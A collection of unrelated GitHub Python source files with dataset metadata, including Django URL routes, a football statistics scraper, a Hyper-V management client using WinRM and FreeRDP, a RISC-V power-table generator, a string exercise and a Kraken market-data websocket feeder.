| BaileyDalton007/Epidemic-Simulator | widgetTempletes.py | widgetTempletes.py | py | 2,066 | python | en | code | 1 | github-code | 13 |
13309757071 | from django.conf.urls import patterns, url
from django.core.urlresolvers import reverse_lazy
from django.views.generic import RedirectView
from expenses.views import *
urlpatterns = patterns('',
url(r'^groups/$', GroupList.as_view(), name='group_list'),
url(r'^groups/add/$', GroupCreate.as_view(), name='group_create'),
url(r'^groups/(?P<pk>\d+)/edit/$', GroupUpdate.as_view(), name='group_update'),
url(r'^groups/(?P<pk>\d+)/delete/$', GroupDelete.as_view(), name='group_delete'),
url(r'^invite/(?P<pk>\d+)/$', InviteCreate.as_view(), name='invite_create'),
url(r'^invite/(?P<pk>\d+)(?P<hash>[0-9a-f]{10})/$', InviteDetail.as_view(), name='invite_detail'),
url(r'^invite/(?P<pk>\d+)(?P<hash>[0-9a-f]{10})/accept/$', InviteAccept.as_view(), name='invite_accept'),
url(r'^(?P<group>\d+)/expenses/$', ExpenseList.as_view(), name='expense_list'),
url(r'^(?P<group>\d+)/expenses/add/$', ExpenseCreate.as_view(), name='expense_create'),
url(r'^(?P<group>\d+)/expenses/(?P<pk>\d+)/edit/$', ExpenseUpdate.as_view(), name='expense_update'),
url(r'^(?P<group>\d+)/expenses/(?P<pk>\d+)/delete/$', ExpenseDelete.as_view(), name='expense_delete'),
url(r'^(?P<group>\d+)/refund/add/$', RefundCreate.as_view(), name='refund_create'),
url(r'^(?P<group>\d+)/refund/add/(?P<pk>\d+)/delete/$', RefundDelete.as_view(), name='refund_delete'),
) | nicbou/billsplitter | expenses/urls.py | urls.py | py | 1,343 | python | en | code | 4 | github-code | 13 |
28000944504 | from urllib.parse import urljoin
import requests
from bs4 import BeautifulSoup
import re
from time import sleep
from dotenv import load_dotenv
import logging
import json
from settings.countries import alpha
load_dotenv()
logging.basicConfig(filename='footstats.log', filemode='a', level=logging.ERROR, format='%(asctime)s %(message)s', datefmt='%Y-%m-%d %H:%M:%S %p')
html_parser = 'html.parser'
class Squad:
def __init__(self) -> None:
self.name = str
self.id = str
self.governing_country = str
self.manager = str
self.stats = []
self.players = []
def parse_fields(entity, type) -> dict:
meta_file = open('./settings/meta.json')
meta_file = json.load(meta_file)
meta = meta_file.get(type)
pattern = r'^[-|+|\d]\d*\.'
for key in list(entity.keys()):
try:
to_parse = entity.get(key)
# verify if the field has on metadata and if need a transformation
if meta.get(key):
if to_parse=='':
entity[key] = None
else:
if re.match(pattern, to_parse):
entity[key] = float(to_parse)
else:
entity[key] = int(re.subn(r'\,','',to_parse.split(' ')[0])[0])
except Exception as error:
logging.error(f'Erro ao converter campo: {error}')
return entity
def get_squads(url) -> list:
"""
Coleta dados dos clubes da liga.
"""
rsp = requests.request('GET',url)
content = rsp.content
squads = []
if rsp.status_code<400:
try:
soup = BeautifulSoup(content, html_parser)
tables = soup.find_all(attrs={'class':'table_container', 'id': re.compile(r'.+_overall')})
if tables:
for table_overall in tables:
rows = table_overall.find_all('tr')
for row in rows:
squad = row.find(attrs={'data-stat':'squad'})
if not squad.name=='th' and squad.find('a'):
squad_link = squad.find('a')['href']
infos = {td['data-stat']: re.sub(r'^\s','',td.text) for td in row.find_all('td')}
# dicionário contendo as informações do squad
squad_info = {
'href': squad_link,
'squad_id': squad_link.split('/')[3]
}
squad_info.update(infos)
squads.append(squad_info)
except Exception as error:
logging.error(f'[+] Erro ao coletar squads: {error}.')
else:
logging.error(f'[+] Erro ao executar requisição: status_code={rsp.status_code} reason={rsp.reason}')
return squads
def get_squad_matchs_stats(url):
sleep(3)
rsp = requests.request('GET',url)
content = rsp.content
squad_matchs_stats = [] # array que armazenará todas as rodas do jogador e será retornada na função
if rsp.status_code<400:
try:
soup = BeautifulSoup(content, html_parser)
table = soup.find(attrs={'class':'stats_table'})
table_id = table.attrs['id']
tbody = table.find('tbody')
rows = tbody.find_all('tr')
for row in rows:
th = row.find('th')
date = th.text or None
# executa apenas se o formato de data estiver correto
date_pattern = r'\d+-\d+-\d+'
if re.match(date_pattern, date):
match_stats = {'date': date}
if table_id=='matchlogs_against':
match_stats.update({'opponent_'+td['data-stat']: re.sub(r'^\s','',td.text) for td in row.find_all('td')})
else:
match_stats.update({td['data-stat']: re.sub(r'^\s','',td.text) for td in row.find_all('td')})
# executa a função que ajusta os datatypes dos campos
stats_round_parsed = parse_fields(match_stats, 'squads')
squad_matchs_stats.append(stats_round_parsed)
except Exception as error:
logging.error(f'[+] Erro ao coletar estatisticas do squad: {error}.')
return squad_matchs_stats
def get_squad_log_types(urlbase, current_url, filters) -> list:
log_types_stats = []
log_types = []
try:
for filter in filters:
if re.search(r'Log Types',filter.text):
options = filter.find_all('div')
for option in options:
if 'disabled' not in option.attrs.get('class'):
if 'current' not in option.attrs['class']:
log_ref = option.find('a').attrs['href']
log_name = re.subn(r'\n','',option.text)[0]
log_type = {'href': log_ref, 'name': log_name}
log_types.append(log_type)
else:
log_name = re.subn(r'\n','',option.text)[0]
log_type = {'href': current_url, 'name': log_name}
log_types.append(log_type)
for log_type in log_types:
log_type_url = urljoin(urlbase, log_type.get('href'))
attr_stats = get_squad_matchs_stats(log_type_url)
for stat in attr_stats:
stat['stats_type'] = log_type.get('name')
log_types_stats.append(stat)
except Exception as error:
logging.error(f'Erro ao coletar log types: {error}')
return log_types_stats
def get_squad_infos(squad, urlbase) -> Squad:
href = squad.get('href')
url = urljoin(urlbase, href)
rsp = requests.request('GET',url)
content = rsp.content
squad_obj = Squad()
squad_obj.id = squad.get('squad_id')
squad_obj.name = squad.get('squad')
if rsp.status_code<400:
try:
soup = BeautifulSoup(content, html_parser)
info_section = soup.find('div',attrs={'id':'info'})
filters = soup.find_all('div',attrs={'class':'filter'}) # TODO adicionar string log types
players_tables = soup.find_all(attrs={'class':'table_wrapper', 'id':re.compile('stats')})
infos = [p.text for p in info_section.find_all('p')]
governing_country = list(filter(lambda x: re.search(r'Governing Country', x), infos))
manager = list(filter(lambda x: re.search(r'Manager', x), infos))
squad_obj.governing_country = re.findall('Governing Country:\s(.+)|$',governing_country[0])[0] if len(governing_country)>0 else None
squad_obj.manager = re.findall('Manager:\s(.+)|$',manager[0])[0] if len(manager)>0 else None
squad_obj.stats = get_squad_log_types(urlbase, url, filters)
squad_obj.players = get_squad_players(players_tables)
except Exception as error:
logging.error(f'Erro ao coletar infos do jogador: {error}')
return squad_obj
def get_squad_players(players_tables) -> list:
"""
Coleta informações básicas sobre os jogadores do clube.\n
Utilize esse função como ponto de partida para coletar estatisticas dos jogadores através do campo href.\n\n
:param squad: dict correspondente ao objeto squad retornado na função get_squads().
"""
squad_players = []
for table in players_tables:
try:
body = table.find('tbody')
if body:
rows = body.find_all('tr')
for row in rows:
if row:
# separa elementos da tabela
th = row.find('th')
# separa elementos da tabela
td = row.find_all('td')
# define o nome e o link de referencia do jogador
name = th.text
href = th.find('a').get('href')
player_id = href.split('/')[3]
player = {
'name': name,
'href': href,
'player_id': player_id
}
# coleta as estatisticas totais do jogador e atualiza dicionário
for stat in td:
if stat.attrs['data-stat']=='matches':
matches = stat.find('a').get('href')
player.update({'matches': matches})
player.update({stat.attrs['data-stat']: stat.text})
player['age'] = int(player.get('age').split('-')[0])
player['nationality'] = alpha.get(player.get('nationality').split(' ')[-1])
# faz parsing dos campos para o tipo correto
player_parsed = parse_fields(player, 'players')
squad_players.append(player_parsed)
except Exception as e:
logging.error(f'[+] Erro ao coletar link dos jogadores: {e}.')
return squad_players | abnerrios/fbstats | fbcollect/squads.py | squads.py | py | 8,160 | python | en | code | 0 | github-code | 13 |
8094040564 | from django.conf.urls import include, url
from django.contrib.auth.decorators import login_required
from apps.mascota.views import (index,mascota_view,mascota_list,
mascota_edit,mascota_delete,MascotaList,MascotaCreate,MascotaUpdate,MascotaDelete,
listado)
urlpatterns = [
# Examples:
# url(r'^$', 'refugio.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', index, name='index'),
url(r'^nuevo$', login_required(MascotaCreate.as_view()), name='mascota_crear'),
url(r'^listar', login_required(MascotaList.as_view()), name='mascota_listar'),
url(r'^editar/(?P<pk>\d+)/$', login_required(MascotaUpdate.as_view()), name='mascota_editar'),
url(r'^eliminar/(?P<pk>\d+)/$', login_required(MascotaDelete.as_view()), name='mascota_eliminar'),
url(r'^listado',listado,name='listado')
]
| josuesf/pythonexamplodjango | apps/mascota/urls.py | urls.py | py | 840 | python | en | code | 0 | github-code | 13 |
17521395927 | # Load packages
import openai
import os
from langchain.chat_models import ChatOpenAI
from langchain.schema import SystemMessage, HumanMessage
from dotenv import load_dotenv
# Declare functions
def SendPromptToChatGPT(user_prompt,
system_message="You are a helpful assistant.",
# LLM parameters
openai_api_key=None,
temperature=0.0,
chat_model_name="gpt-3.5-turbo",
verbose=True):
# If OpenAI API key is not provided, then try to load from .env file
if openai_api_key is None:
load_dotenv()
try:
openai_api_key = os.environ['OPENAI_API_KEY']
except:
raise ValueError("No API key provided and no .env file found. If you need a OpenAI API key, visit https://platform.openai.com/")
# Create an instance of the ChatGPT chat model
chat_model = ChatOpenAI(openai_api_key=openai_api_key)
# Define the system and user messages
system_msg = SystemMessage(content=system_message)
user_msg = HumanMessage(content=user_prompt)
# Send the system and user messages as a one-time prompt to the chat model
response = chat_model([system_msg, user_msg])
# Print the response
if verbose:
print("System message:")
print(system_message, "\n")
print("User prompt:")
print(user_prompt, "\n")
print("Response:")
print(response.content)
# Return the response
return response
# # Test function
# response = SendPromptToChatGPT(
# user_prompt="""
# Break this key intelligence question into less than four sub-questions: "Which targets are Hamas most likely to strike in their war against Israel?"
# """
# ,
# system_message="""
# You are a project manager. You specialize in taking a key intelligence question and breaking it down into sub-questions.
# When creating the sub-questions, identify the main components of the original question. What are the essential elements or variables that the decision maker is concerned about?
# """,
# openai_api_key=open("C:/Users/oneno/OneDrive/Desktop/OpenAI key.txt", "r").read()
# )
| KyleProtho/AnalysisToolBox | Python/TextSummarizationAndGeneration/SendPromptToChatGPT.py | SendPromptToChatGPT.py | py | 2,260 | python | en | code | 0 | github-code | 13 |
71756412817 | """docup_core URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls.static import static
from django.contrib import admin
# from django.shortcuts import redirect
from django.urls import path, include
from django.views.generic import RedirectView
from . import settings
from django.conf.urls import include, url
from fcm_django.api.rest_framework import FCMDeviceAuthorizedViewSet
admin.site.site_header = "Neuronio Team"
admin.site.site_title = "Neuronio Admin"
admin.site.index_title = "Welcome to Server Portal"
urlpatterns = [
url(r'^$', RedirectView.as_view(url='https://neuronio.ir'), name='main site'),
url(r'^baton/', include('baton.urls')),
path('admin/', admin.site.urls),
path('api/auth/', include('authentication.urls')),
path('api/chat/', include('chat.urls')),
path('api/', include('follow_up.urls')),
path('payment/', include('payment.urls')),
path('medical-test/', include('medical_test.urls')),
path('api-auth/', include('rest_framework.urls')),
path('devices/', FCMDeviceAuthorizedViewSet.as_view({'post': 'create', 'get': 'list'}), name='create_fcm_device'),
path('document/',include('doc.urls'))
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| arezoo88/docup_project | neuronio/urls.py | urls.py | py | 1,935 | python | en | code | 0 | github-code | 13 |
4886355545 | #!/usr/bin/env python3
# coding: utf-8
from winrm import Protocol
from winrm import Response
from base64 import b64encode
from datetime import datetime
from datetime import timedelta
import subprocess
import json
import os.path
import time
import platform
import re
vms = None
server = None
config = None
vms_cache_filename = None
states = {3: 'off',
2: 'running',
9: 'paused',
6: 'saved'}
def connect(index):
"""
Connect to virtual machine by index using freerdp
Args:
index (int): The machine's index generated in the current cache
"""
load_vms()
vm_id = vms[index]['Id']
user = config['user']
passw = config['pass']
host = config['host']
vm_info = get_vm(index)
if vm_info != '' and vm_info['State'] != 2 and vm_info['State'] != 9:
start_vm(index)
time.sleep(10)
if platform.uname()[0] == "Linux":
freerdp_bin = "xfreerdp"
elif platform.uname()[0] == "Windows":
freerdp_bin = "wfreerdp.exe"
cmd = [freerdp_bin, '/v:{0}'.format(host), '/vmconnect:{0}'.format(vm_id), '/u:{0}'.format(user),
'/p:{0}'.format(passw),
'/t:{} [{}] {}'.format(host, index, vm_info['Name']), '/cert-ignore']
# print(cmd)
try:
subprocess.Popen(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
#subprocess.Popen(cmd)
except FileNotFoundError:
print("{} not found in PATH".format(freerdp_bin))
# retval = p.wait()
def update_cache(index, new_state):
"""
Update machine state on cache by index
Called after start, stop, pause and resume operations
Args:
index (int): machine index in current cache
new_state (int): represented by states dict
"""
vms[index]['State'] = new_state
with open(vms_cache_filename, 'w') as vms_cache_file:
json.dump(vms, vms_cache_file, indent=4)
def update_all_cache(force=False):
"""
Checks cache file modification time and update vm list
Creates cache file if nonexistent
Args:
force (bool, optional): Whether should force cache update or not
Returns:
bool: True for success
"""
modified = datetime.min
if os.path.isfile(vms_cache_filename):
modified = datetime.fromtimestamp(os.path.getmtime(vms_cache_filename))
if modified < datetime.now() - timedelta(hours=int(config['sync_interval'])) or force:
ps_script = "Get-VM * | Select Name,Id,State,Uptime | ConvertTo-Json"
rs = run_ps(ps_script, server)
if rs.status_code != 0:
print(rs.std_err)
return False
vms_json = json.loads(rs.std_out.decode('latin-1'))
# If there is only one vm, make it a list
if type(vms_json) is dict:
vms_json = [ vms_json ]
with open(vms_cache_filename, 'w') as vms_cache_file:
json.dump(vms_json, vms_cache_file, indent=4)
return True
def load_vms():
"""
Loads current cache file into memory
Returns:
bool: True for success
"""
global vms
try:
with open(vms_cache_filename, 'r') as vms_cache_file:
vms = json.load(vms_cache_file)
except IOError:
print("Cannot access file {0}".format(vms_cache_filename))
return False
return True
def list_vms():
"""
List virtual machines
"""
load_vms()
# Listing
print("-- Hyper-V Virtual Machine Listing --")
# Header
print("{0} {1} {2} {3}".format("Index".rjust(5), "State".ljust(7), "Name".ljust(30), "Uptime"))
# Listing
for vm in vms:
index = str(vms.index(vm)).rjust(3)
state = states.get(vm['State'], "unknown").ljust(7)
name = str(vm['Name']).ljust(30)
uptime = str(timedelta(hours=vm['Uptime']['TotalHours']))
print("[{0}] {1} {2} {3}".format(index, state, name, uptime))
def list_vm_snaps(vm_index):
"""
List vm snapshots by vm index
Args:
vm_index (int): The machine's index generated in the current cache
"""
load_vms()
vm_name = vms[vm_index]['Name']
ps_script = "Get-VMSnapshot -VMName {0} | Select Name,ParentSnapshotName,CreationTime | ConvertTo-Json".format(vm_name)
rs = run_ps(ps_script, server)
if rs.status_code != 0:
print(rs.std_err)
return False
try:
snaps_json = json.loads(rs.std_out.decode('latin-1'))
except Exception as e:
print("Virtual Machine {} has no snapshots: {}".format(vm_name, e))
return
# If there is only one snap, make it a list
if type(snaps_json) is dict:
snaps_json = [ snaps_json ]
print("-- Virtual Machine Snapshots --")
print("{0} {1} {2}".format("Name".ljust(30), "Parent".ljust(30), "CreationTime"))
for snap in snaps_json:
snapname = str(snap['Name']).ljust(30)
parent = str(snap['ParentSnapshotName']).ljust(30)
creation = datetime.fromtimestamp(float(re.search("[0-9]+", snap['CreationTime']).group())/1000.0)
print("{0} {1} {2}".format(snapname, parent, creation.strftime("%d/%m/%Y %H:%M:%S")))
def restore_vm_snap(vm_index, snap_name):
"""
Restore virtual machine snapshot
Args:
vm_index (int): The machine's index generated in the current cache
snap_name (str): The name of the checkpoint to be restored
Returns:
bool: True if success
"""
load_vms()
vm_name = vms[vm_index]['Name']
ps_script = 'Restore-VMSnapshot -Name "{0}" -VMName {1} -Confirm:$false'.format(snap_name, vm_name)
print('Restoring snapshot "{0}" in {1}'.format(snap_name, vm_name))
rs = run_ps(ps_script, server)
if rs.status_code != 0:
print(rs.std_err)
return False
print("Success")
return True
def remove_vm_snapshot(vm_index, snap_name, recursive=False):
"""
Deletes a virtual machine checkpoint
Args:
vm_index (int): The machine's index generated in the current cache
snap_name (str): The name of the checkpoint to be deleted
recursive (bool, optional): Specifies that the checkpoint’s children are to be
deleted along with the checkpoint
Returns:
bool: True if success
"""
load_vms()
vm_name = vms[vm_index]['Name']
ps_script = 'Remove-VMSnapshot -VMName "{0}" -Name "{1}"'.format(vm_name, snap_name)
if recursive:
ps_script += " -IncludeAllChildSnapshots"
ps_script += " -Confirm:$false"
print('Removing snapshot "{0}" in "{1}"'.format(snap_name, vm_name))
if recursive:
print("and it's children")
rs = run_ps(ps_script, server)
if rs.status_code != 0:
print(rs.std_err)
return False
print("Success")
return True
def create_vm_snapshot(vm_index, snap_name):
"""
Create a new snapshot with vm's current state
Args:
vm_index (int): The machine's index generated in the current cache
snap_name (str): The name of the checkpoint to be created
Returns:
bool: True if success
"""
load_vms()
vm_name = vms[vm_index]['Name']
ps_script = 'Checkpoint-VM -Name "{0}" -SnapshotName "{1}" -Confirm:$false'.format(vm_name, snap_name)
print('Creating snapshot "{0}" in "{1}"'.format(snap_name, vm_name))
rs = run_ps(ps_script, server)
if rs.status_code != 0:
print(rs.std_err)
return False
print("Success")
return True
def get_vm(vm_index):
"""
Gets vm info by index
Args:
vm_index (int): The machine's index generated in the current cache
"""
load_vms()
vm_name = vms[vm_index]['Name']
ps_script = "Get-VM -Name {0} | Select Name,Id,State | ConvertTo-Json".format(vm_name)
rs = run_ps(ps_script, server)
if rs.status_code != 0:
print(rs.std_err)
return
vm_json = json.loads(rs.std_out.decode('latin-1'))
return vm_json
def stop_vm(vm_index, force=False):
"""
Stop virtual machine
Args:
vm_index (int): The machine's index generated in the current cache
force (bool): Whether should force shutdown or not
"""
load_vms()
vm_name = vms[vm_index]['Name']
ps_script = "Stop-VM -Name {}".format(vm_name)
if force:
ps_script += " -Force"
print('Stopping VM "{}", force: {}'.format(vm_name, force))
rs = run_ps(ps_script, server)
if rs.status_code != 0:
print(rs.std_err)
return False
update_cache(vm_index, 3)
print("Success")
return True
def resume_vm(vm_index):
"""
Resume (paused) virtual machine
Args:
vm_index (int): The machine's index generated in the current cache
"""
load_vms()
vm_name = vms[vm_index]['Name']
ps_script = "Resume-VM -Name {0}".format(vm_name)
print('Resuming VM "{0}"'.format(vm_name))
rs = run_ps(ps_script, server)
if rs.status_code != 0:
print(rs.std_err)
return False
update_cache(vm_index, 2)
print("Success")
return True
def pause_vm(vm_index):
"""
Pause virtual machine
Args:
vm_index (int): The machine's index generated in the current cache
"""
load_vms()
vm_name = vms[vm_index]['Name']
ps_script = "Suspend-VM -Name {0}".format(vm_name)
print('Pausing VM "{0}"'.format(vm_name))
rs = run_ps(ps_script, server)
if rs.status_code != 0:
print(rs.std_err)
return False
update_cache(vm_index, 9)
print("Success")
return True
def start_vm(vm_index):
"""
Start virtual machine
Args:
vm_index (int): The machine's index generated in the current cache
"""
load_vms()
vm_name = vms[vm_index]['Name']
ps_script = "Start-VM -Name {0}".format(vm_name)
print('Starting VM "{0}"'.format(vm_name))
rs = run_ps(ps_script, server)
if rs.status_code != 0:
print(rs.std_err)
return False
update_cache(vm_index, 2)
print("Success")
return True
def setup(configp):
"""
Setup hvclient globals and create protocol with server host and credentials
Args:
configp (dict): Configuration from config file
"""
global config
global server
global vms_cache_filename
config = configp
domain = config['domain']
user = config['user']
passw = config['pass']
host = config['host']
vms_cache_filename = config['cache_file']
server = Protocol(endpoint='http://{0}:5985/wsman'.format(host),
transport='ntlm',
username='{0}\{1}'.format(domain, user),
password=passw,
server_cert_validation='ignore')
def run_ps(ps, proto):
"""
Run powershell script on target machine
Args:
ps (str): Powershell script to run
proto (Protocol): Protocol containing target machine
Returns:
Response: Object containing stderr, stdout and exit_status
"""
encoded_ps = b64encode(ps.encode('utf_16_le')).decode('ascii')
rs = run_cmd('powershell -encodedcommand {0}'.format(encoded_ps), proto)
return rs
def run_cmd(cmd, proto):
"""
Run batch script on target machine
Args:
cmd (str): batch script to run
proto (Protocol): Protocol containing target machine
Returns:
Response: Object containing stderr, stdout and exit_status
"""
shell_id = proto.open_shell()
command_id = proto.run_command(shell_id, cmd)
rs = Response(proto.get_command_output(shell_id, command_id))
proto.cleanup_command(shell_id, command_id)
proto.close_shell(shell_id)
return rs
| reinaldorossetti/hypy | hypy/hvclient.py | hvclient.py | py | 11,685 | python | en | code | null | github-code | 13 |
22437120755 | #!/usr/bin/python
import bz2
import argparse
import os
import re
import statistics as st
import numpy as np
import json
EXPECTED_END_OF_SIMULATION = "Correct End of Simulation"
class PowerData(object):
def __init__(self, leakage, internal, switching, cycles, valid):
self.leakage = leakage
self.internal = internal
self.switching = switching
self.cycles = cycles
self.valid = valid
class PowerTable(object):
def __init__(self, cpu_freq):
self.power_table = {}
self.time_per_cycle = np.float128(1.0) / np.float128(cpu_freq)
def find_entry(self, index, instruction):
if instruction not in self.power_table:
self.power_table[instruction] = {}
if index not in self.power_table[instruction]:
self.power_table[instruction][index] = PowerData(np.float128(0.0), np.float128(0.0), np.float128(0.0), np.float128(0.0), True)
return self.power_table[instruction][index]
def update_power(self, index, instruction, leakage, internal, switching):
entry = self.find_entry(index, instruction)
entry.leakage = np.float128(leakage)
entry.internal = np.float128(internal)
entry.switching = np.float128(switching)
def update_cycles(self, index, instruction, cycles):
entry = self.find_entry(index, instruction)
entry.cycles = np.float128(cycles)
def invalidate_data(self, index, instruction):
entry = self.find_entry(index, instruction)
entry.valid = False
def get_energy(self, instruction):
leakage = []
internal = []
switching = []
total = []
for index in self.power_table[instruction]:
data = self.power_table[instruction][index]
if data.valid:
t = data.cycles * self.time_per_cycle
leakage.append(data.leakage * t)
internal.append(data.internal * t)
switching.append(data.switching * t)
total.append((data.leakage + data.internal + data.switching) * t)
if len(total) > 0:
return (st.median(leakage), st.median(internal), st.median(switching), st.median(total))
else:
return (0.0, 0.0, 0.0, 0.0)
def show_report(self):
print ("%15s %15s %15s %15s %15s" % ("Instruction", "Leakage", "Internal", "Switching", "Total"))
for instruction in self.power_table:
et = self.get_energy(instruction)
# print "%s\t%f\t%f\t%f\t%f\t%f\t%f" % (key, st.median(leakage), st.median(internal), st.median(switching), st.median(total), st.stdev(total), st.variance(total))
print ("%15s %1.14f %1.14f %1.14f %1.14f" % (instruction, et[0], et[1], et[2], et[3]))
def GenEnergyTable(init_pt, full_pt):
print ("%15s %15s %15s %15s %15s" % ("Instruction", "Leakage", "Internal", "Switching", "Total"))
energy_table = {}
for instruction in full_pt.power_table:
init = init_pt.get_energy(instruction)
full = full_pt.get_energy(instruction)
if (init[3] > 0.0 and full[3] > init[3]):
leakage = full[0] - init[0]
internal = full[1] - init[1]
switching = full[2] - init[2]
print ("%15s %1.14f %1.14f %1.14f %1.14f" % (instruction,
leakage,
internal,
switching,
full[3] - init[3]))
energy_table[instruction] = []
energy_table[instruction].append({
"leakage": float(leakage),
"internal": float(internal),
"switching": float(switching)
})
else:
e = "----------------"
print ("%15s %15s %15s %15s %15s" % (instruction, e, e, e, e))
return energy_table
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'Generate power tables')
parser.add_argument('-i', '--input', required=True, help='Input directory')
parser.add_argument('-o', '--output', required=False, help='Output file')
args = parser.parse_args()
dir = args.input
full_pt = PowerTable(40000000.0)
init_pt = PowerTable(40000000.0)
for file in os.listdir(dir):
if "init" in file:
pt = init_pt
else:
pt = full_pt
sp_data = file.split("_")
if len(sp_data) < 2:
continue
index = sp_data[0]
if "not_taken" in file:
inst_name = sp_data[3] + "_not_taken"
else:
inst_name = sp_data[1]
with open(dir + "/" + file, "r") as f:
data = f.read();
if file.endswith(".error"):
if len(data) > 0:
print ("Error: %s is not empty" % (file))
pt.invalidate_data(index, inst_name)
elif file.endswith(".log"):
if EXPECTED_END_OF_SIMULATION not in data:
print ("Error: %s invalid simulation result" % (file))
pt.invalidate_data(index, inst_name)
else:
idx = data.rfind("CLK(") + 4
cycles = int(data[idx:idx+8], 16)
pt.update_cycles(index, inst_name, cycles)
elif file.endswith(".txt"):
power_data = data.split("\n")[15].split()
pt.update_power(index, inst_name, float(power_data[1]), float(power_data[2]), float(power_data[3]))
print ("")
print ("######### Full result #########")
full_pt.show_report()
print ("")
print ("######### Init result #########")
init_pt.show_report()
print ("")
print ("######### Energy result #########")
data = GenEnergyTable(init_pt, full_pt)
with open(args.output, 'w') as outfile:
json.dump(data, outfile)
| AlissonLinhares/riscv-power-tables | gen-power-table.py | gen-power-table.py | py | 5,980 | python | en | code | 0 | github-code | 13 |
21586187671 | """
Space Replacement
-----------------
Write a method to replace all spaces in a string with %20. The string
is given in a characters array, you can assume it has enough space for
replacement and you are given the true length of the string.
You code should also return the new length of the string after replacement.
Note:
If you are using Java or Python,please use characters array instead of string.
Example 1:
- Input: string[] = "Mr John Smith" and length = 13
- Output: string[] = "Mr%20John%20Smith" and return 17
- Explanation: The string after replacement should be "Mr%20John%20Smith",
you need to change the string in-place and return the new length 17.
Example 2:
- Input: string[] = "LintCode and Jiuzhang" and length = 21
- Output: string[] = "LintCode%20and%20Jiuzhang" and return 25
- Explanation: The string after replacement should be
"LintCode%20and%20Jiuzhang", you need to change the string in-place and
return the new length 25.
Challenge:
Do it in-place.
Reference:
- https://algorithm.yuanbin.me/zh-hans/string/space_replacement.html
- https://www.lintcode.com/problem/space-replacement/
"""
import unittest
def replace_blank(string, length):
"""
Replace all spaces in a string with %20 in place
Time complexity: O(n)
Space complexity: O(1)
:param string: given string
:type string: list[str]
:param length: the true length of given string
:type length: int
:return: replaced string
:rtype: list[str]
"""
# get the number of spaces
num_space = 0
for i in range(length):
if string[i].isspace():
num_space += 1
# compute new length
new_length = num_space * 2 + length
# assign new value from right to left
for i in range(length - 1, -1, -1):
if string[i] == ' ':
string[new_length - 1] = '0'
string[new_length - 2] = '2'
string[new_length - 3] = '%'
new_length -= 3
else:
string[new_length - 1] = string[i]
new_length -= 1
return num_space * 2 + length
class TestSpaceReplacement(unittest.TestCase):
def test_space_replacement(self):
s = list('Mr John Smith') + [''] * 4
res = replace_blank(s, 13)
self.assertListEqual(list('Mr%20John%20Smith'), s)
self.assertEqual(17, res)
s = list('LintCode and Jiuzhang') + [''] * 4
res = replace_blank(s, 21)
self.assertListEqual(list('LintCode%20and%20Jiuzhang'), s)
self.assertEqual(25, res)
s = list(' ') + [''] * 2
res = replace_blank(s, 1)
self.assertListEqual(list('%20'), s)
self.assertEqual(3, res)
if __name__ == '__main__':
unittest.main()
| corenel/lintcode | algorithms/212_space_replacement.py | 212_space_replacement.py | py | 2,777 | python | en | code | 1 | github-code | 13 |
13140031331 | import json
from tradingkit.data.feed.websocket_feeder import WebsocketFeeder
from tradingkit.pubsub.event.book import Book
from tradingkit.pubsub.event.trade import Trade
class PublicKrakenFeeder(WebsocketFeeder):
# Converts symbols from normal to kraken vocab
denormalized_symbol = {
"BTC/EUR": "XBT/EUR",
"BTC/USD": "XBT/USD",
"BTC/USDT": "XBT/USDT",
"ETH/BTC": "ETH/XBT",
}
# Converts symbols from kraken to normal vocab
normalized_symbol = {
"XBT/EUR": "BTC/EUR",
"XBT/USD": "BTC/USD",
"XBT/USDT": "BTC/USDT",
"ETH/XBT": "ETH/BTC",
}
orderbooks = {}
ws_errors = [
"ping/pong timed out",
"Connection to remote host was lost."
]
def __init__(self, symbol):
super().__init__(symbol, None, "wss://ws.kraken.com")
def on_open(self, ws):
ws.send(json.dumps({
'event': 'subscribe',
'subscription': {'name': 'trade'},
'pair': [self.denormalized_symbol[self.symbol]]
}))
ws.send(json.dumps({
'event': 'subscribe',
'subscription': {'name': 'book'},
'pair': [self.denormalized_symbol[self.symbol]]
}))
def on_message(self, ws, message):
data = json.loads(message)
if "trade" in data:
trade_data_list = self.transform_trade_data(data)
for trade_data in trade_data_list:
self.dispatch(Trade(trade_data))
elif "book-10" in data:
order_book = self.transform_book_data(data)
self.dispatch(Book(order_book))
def transform_book_data(self, data):
keys = data[1].keys()
symbol = self.normalized_symbol[data[-1]]
if "as" in keys:
self.orderbooks[symbol] = {
"bids": [
[
float(data[1]["bs"][0][0]),
float(data[1]["bs"][0][1])
]
],
"asks": [
[
float(data[1]["as"][0][0]),
float(data[1]["as"][0][1])
]
],
"timestamp": int(float(data[1]["as"][0][2]) * 1000),
"symbol": symbol,
'exchange': 'kraken'
}
else:
if "a" in keys:
self.orderbooks[symbol]["asks"] = [
[
float(data[1]["a"][0][0]),
float(data[1]["a"][0][1])
]
]
self.orderbooks[symbol]["timestamp"] = int(float(data[1]["a"][0][2]) * 1000)
self.orderbooks[symbol]["symbol"] = symbol
self.orderbooks[symbol]["exchange"] = 'kraken'
if "b" in keys:
self.orderbooks[symbol]["bids"] = [
[
float(data[1]["b"][0][0]),
float(data[1]["b"][0][1])
]
]
self.orderbooks[symbol]["timestamp"] = int(float(data[1]["b"][0][2]) * 1000)
self.orderbooks[symbol]["symbol"] = symbol
self.orderbooks[symbol]["exchange"] = 'kraken'
return self.orderbooks[symbol]
def transform_trade_data(self, data):
trade_data_list = []
symbol = self.normalized_symbol[data[-1]]
for trade in data[1]:
price = float(trade[0])
amount = float(trade[1])
cost = float(trade[0]) * float(trade[1])
timestamp = int(float(trade[2]) * 1000)
side = 'buy' if trade[3] == 'b' else 'sell'
type = 'market' if trade[4] == 'm' else 'limit'
trade_data = {
'price': price,
'amount': amount,
'cost': cost,
'timestamp': timestamp,
'side': side,
'type': type,
'symbol': symbol,
'exchange': 'kraken'
}
trade_data_list.append(trade_data)
